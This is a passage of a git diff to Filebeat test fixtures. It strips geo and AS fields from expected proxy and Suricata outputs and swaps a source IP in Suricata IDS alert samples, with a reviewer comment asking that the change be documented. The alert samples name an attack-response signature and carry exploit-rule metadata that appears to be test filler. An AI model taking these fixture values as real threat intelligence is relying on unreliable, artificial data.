"destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", @@ -5026,11 +4605,6 @@ }, { "@timestamp": "2006-09-08T04:22:54.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.213.132", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -5093,11 +4667,6 @@ }, { "@timestamp": "2006-09-08T04:22:56.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.194.14", "event.action": "TCP_MISS", "event.code": "GET", @@ -5161,11 +4730,6 @@ }, { "@timestamp": "2006-09-08T04:22:57.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.109.124.55", "event.action": "TCP_MISS", "event.code": "CONNECT", @@ -5283,16 +4847,6 @@ }, { "@timestamp": "2006-09-08T04:22:57.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", @@ -5355,16 +4909,6 @@ }, { "@timestamp": "2006-09-08T04:22:58.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -5427,13 +4971,6 @@ }, { "@timestamp": "2006-09-08T04:22:58.000Z", - "destination.as.number": 36752, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "209.73.177.115", "event.action": "TCP_MISS", "event.code": "CONNECT", @@ -5491,16 +5028,6 @@ }, { "@timestamp": "2006-09-08T04:22:58.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.167", "event.action": "TCP_MISS", "event.code": "GET", @@ -5563,16 +5090,6 @@ }, { "@timestamp": "2006-09-08T04:22:58.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -5695,16 +5212,6 @@ }, { "@timestamp": "2006-09-08T04:22:59.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.167", "event.action": "TCP_MISS", "event.code": "GET", @@ -5767,16 +5274,6 @@ }, { "@timestamp": "2006-09-08T04:22:59.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", @@ -5839,16 +5336,6 @@ }, { "@timestamp": "2006-09-08T04:23:00.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.167", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -6031,11 +5518,6 @@ }, { "@timestamp": "2006-09-08T04:23:01.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.109.125.112", "event.action": "TCP_MISS", "event.code": "GET", @@ -6098,13 +5580,6 @@ }, { "@timestamp": "2006-09-08T04:23:02.000Z", - "destination.as.number": 34010, - "destination.as.organization.name": "Yahoo! UK Services Limited", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.4964, - "destination.geo.location.lon": -0.1224, "destination.ip": "217.12.10.96", "event.action": "TCP_MISS", "event.code": "GET", @@ -6222,16 +5697,6 @@ }, { "@timestamp": "2006-09-08T04:23:04.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.169", "event.action": "TCP_SWAPFAIL_MISS", "event.code": "GET", 
@@ -6354,16 +5819,6 @@ }, { "@timestamp": "2006-09-08T04:23:07.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.169", "event.action": "TCP_MISS", "event.code": "GET", diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log index 15d880f06302..8a2eef5d814e 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log +++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log 
@@ -1 +1 @@
-{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
+{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"81.2.69.143","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
index 3e8832cbd248..c8a797a58b83 100644
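Review bot: The substituted source address 81.2.69.143 only keeps the geo assertions alive if it resolves in whatever GeoIP database the pipeline tests are run against, and nothing in this fixture records why a real public address was swapped for it, so a maintainer who later regenerates the sample from a live sensor will silently drop the geo coverage again. A JSON log line has no comment syntax, so put a short README next to the fixture (or a line in the module's test notes) saying that the source IP is deliberately chosen to hit the test GeoIP database and must be kept, and that the expected `network.community_id` is derived from it and has to be regenerated whenever the address changes. The rest of this diff simply removes the geo and AS fields from the other modules' expected outputs, which as far as I can tell leaves this fixture as the only one still exercising the geo enrichment; that is worth stating in the same note so it is not "cleaned up" the same way.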
--- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
@@ -15,7 +15,7 @@ "event.dataset": "suricata.eve", "event.kind": "alert", "event.module": "suricata", - "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"81.2.69.143\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad 
Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "event.severity": 2, "event.start": "2021-01-22T22:28:38.673Z", "event.type": [ @@ -29,7 +29,7 @@ "log.offset": 0, "message": "Potentially Bad Traffic", "network.bytes": 1372, - "network.community_id": "1:/b5R3BDG/6TU2Pu+pRF8w6d1Z18=", + "network.community_id": "1:fmTf/MbjDMinU9coqCwDUc82LmA=", "network.direction": "inbound", "network.packets": 11, "network.protocol": "http", 
@@ -39,23 +39,23 @@ ], "related.ip": [ "10.31.64.240", - "52.222.141.99" + "81.2.69.143" ], "rule.category": "Potentially Bad Traffic", "rule.id": "2100498", "rule.name": "GPL ATTACK_RESPONSE id check returned root", "service.type": "suricata", - "source.address": "52.222.141.99", + "source.address": "81.2.69.143", "source.bytes": 496, - "source.geo.city_name": "Seattle", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 47.6348, - "source.geo.location.lon": -122.3451, - "source.geo.region_iso_code": "US-WA", - "source.geo.region_name": "Washington", - "source.ip": "52.222.141.99", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.mac": "00:03:2d:3f:e5:63", "source.packets": 6, "source.port": 80, diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json index c9878e61a1cb..209f2519e6c3 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json 
@@ -2,18 +2,8 @@ { "@timestamp": "2018-10-03T14:42:44.836Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.net", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, @@ -84,18 +74,8 @@ { "@timestamp": "2018-10-03T16:16:26.711Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.net", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, 
@@ -166,18 +146,8 @@ { "@timestamp": "2018-10-03T16:44:50.813Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.net", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, @@ -248,18 +218,8 @@ { "@timestamp": "2018-10-03T16:45:09.267Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.org", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, 
@@ -330,18 +290,8 @@ { "@timestamp": "2018-10-03T16:45:34.481Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.org", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, @@ -412,18 +362,8 @@ { "@timestamp": "2018-10-03T17:02:38.900Z", "destination.address": "93.184.216.34", - "destination.as.number": 15133, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 1654, "destination.domain": "example.org", - "destination.geo.city_name": "Norwell", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.1596, - "destination.geo.location.lon": -70.8217, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "93.184.216.34", "destination.packets": 3, "destination.port": 80, 
@@ -494,18 +434,8 @@ { "@timestamp": "2018-10-04T09:34:59.009Z", "destination.address": "91.189.88.152", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 1654, "destination.domain": "security.ubuntu.com", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5132, - "destination.geo.location.lon": -0.0961, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "91.189.88.152", "destination.packets": 3, "destination.port": 80, @@ -576,18 +506,8 @@ { "@timestamp": "2018-10-04T09:34:59.168Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 417, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 3, "destination.port": 80, 
@@ -658,18 +578,8 @@ { "@timestamp": "2018-10-04T09:34:59.288Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 3445, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 5, "destination.port": 80, @@ -740,18 +650,8 @@ { "@timestamp": "2018-10-04T09:34:59.289Z", "destination.address": "91.189.88.152", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 90543, "destination.domain": "security.ubuntu.com", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5132, - "destination.geo.location.lon": -0.0961, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "91.189.88.152", "destination.packets": 62, "destination.port": 80, 
@@ -822,18 +722,8 @@ { "@timestamp": "2018-10-04T09:34:59.356Z", "destination.address": "91.189.88.152", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 145014, "destination.domain": "security.ubuntu.com", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5132, - "destination.geo.location.lon": -0.0961, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "91.189.88.152", "destination.packets": 98, "destination.port": 80, @@ -904,18 +794,8 @@ { "@timestamp": "2018-10-04T09:34:59.456Z", "destination.address": "91.189.88.152", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 330525, "destination.domain": "security.ubuntu.com", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5132, - "destination.geo.location.lon": -0.0961, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "91.189.88.152", "destination.packets": 221, "destination.port": 80, 
@@ -986,18 +866,8 @@ { "@timestamp": "2018-10-04T09:34:59.747Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 96554, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 67, "destination.port": 80, @@ -1068,18 +938,8 @@ { "@timestamp": "2018-10-04T09:34:59.953Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 174843, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 119, "destination.port": 80, 
@@ -1150,18 +1010,8 @@ { "@timestamp": "2018-10-04T09:35:00.250Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 376452, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 253, "destination.port": 80, @@ -1232,18 +1082,8 @@ { "@timestamp": "2018-10-04T09:35:00.401Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 468170, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 314, "destination.port": 80, 
@@ -1314,18 +1154,8 @@ { "@timestamp": "2018-10-04T09:35:00.776Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 880323, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 588, "destination.port": 80, @@ -1396,18 +1226,8 @@ { "@timestamp": "2018-10-04T09:35:00.897Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 884342, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 591, "destination.port": 80, 
@@ -1478,18 +1298,8 @@ { "@timestamp": "2018-10-04T09:35:01.362Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 1467603, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 979, "destination.port": 80, @@ -1559,18 +1369,8 @@ { "@timestamp": "2018-10-04T09:35:01.575Z", "destination.address": "91.189.91.23", - "destination.as.number": 41231, - "destination.as.organization.name": "Canonical Group Limited", "destination.bytes": 1618380, "destination.domain": "archive.ubuntu.com", - "destination.geo.city_name": "Boston", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 42.3562, - "destination.geo.location.lon": -71.0631, - "destination.geo.region_iso_code": "US-MA", - "destination.geo.region_name": "Massachusetts", "destination.ip": "91.189.91.23", "destination.packets": 1079, "destination.port": 80, diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log index a5e1a8fbd3ec..19935d3ae4c5 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log +++ b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log 
@@ -1 +1 @@ -{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} +{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"81.2.69.143","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad 
